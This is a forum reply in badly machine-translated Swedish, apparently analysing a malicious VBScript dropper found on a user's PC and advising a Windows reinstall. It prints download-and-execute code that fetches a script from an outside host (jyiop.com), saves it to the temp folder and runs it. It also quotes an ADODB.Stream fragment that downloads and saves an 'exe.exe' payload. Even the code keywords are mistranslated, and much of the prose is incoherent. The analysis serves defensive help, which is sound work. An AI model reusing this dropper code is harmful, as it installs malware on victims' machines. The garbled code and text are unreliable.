Inte villig förmiddag I att gå så långt, som öppna websitesna som du nämnde emellertid, från skrivar över är här vad jag ser…,
Skriva 1 skapar ett tomt sparar, anknyter till en website och nedladdar det nöjt av sidan och dumpar det in i det tomt sparar. Detta sparar sparas som ”yb.vbs” och är förment att utföra.
-------------------------------------------------------------------
B= " yb.vbs ",
Med CreateObject (”MSXML2.XMLHTTP
”)
.open ”FÅR”, ”
http://jyiop.com/kr/yb.vbs” som är falsk
.send ()
Uppsättning A = CreateObject (”Scripting.FileSystemObject
”)
Uppsättning D = A.CreateTextFile (A.GetSpecialFolder
(
2) + ”\” + B)
D.WriteLine .responseText
Avsluta med
D.Close
CreateObject (”WScript.Shell
”). Kör A.GetSpecialFolder (2) +” \ ”+ B
-------------------------------------------------------------------
Kliva 2 nu, som vbsna sparar har skapats, och kör, det försök att besöka en annan webpage, men denna tid sparar rengöringsduksidan som är nöjd in i en spara som kallas ”exe.exe”. Detta nytt sparar ska sparas in i användarevikariemappen.
Skriva kör därefter spara ”exe.exe”.
Som du nämnde, taskkill stoppar Windows Media Player - varför, som vet?!?!
Skriva tar därefter bort vben skrivar som kliver skapad 1 (skriva som är för närvarande spring).
Det finns 3 understöder väntan, därefter som spara ”exe.exe” tas bort.
Denna del;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Om c.Status = x därefter
u=c.ResponseBody: d.Open: d.Type
= y: d.Write u: d.SaveToFile b: d.Close]
är skrivamaskinskrivningen som öppnar en spara som ska strömmer i webpagen - ingenting att göra med Adobe. ”c.Status” - skriva väntar webpagen för att vara ordnar till och passformen att nedladda. ”u=c.ResponseBody” tar de rengöringsduksidan och knuffarna det in i en variabel. Strömma öppnas, och texten nedladdas in i variabeln. Spara sparas och stängs. I denna skriva webpagen/spara sparas in i vikariemappen som ”exe.exe”.
Den verkliga faran är att ”exe.exe” sparar. När den har körts, det finns inte något träffande vad den planlades för att göra.
Att datoren smittas fortfarande med en virus. Programet ”exe.exe” kunde ha nedladdat andra virus i bakgrunden för att hindra bildläsningar av systemet. Faktumet, att du kan se det öppna befallafönstret och skriva försöks för att köra berättar mig att det finns något ondsint sparar fortfarande att dröja sig kvar.
Det kan vara tid att utvärdera vilka behov att sparas från det bearbeta med maskin och starta ånyo med en ominstallering av Windows och applikationer. Det låter dramatiskt men att se, som antivirusen inte avkänner något den krassliga I-funderare som du är på peka av ingen retur. Minns att, så länge som det ondsint kodifierar är på där, några kör; är det USB-minnespinnen, kameran Etc., kan potentiellt innehålla viruset/trojanen, om det fästes till bearbeta med maskin.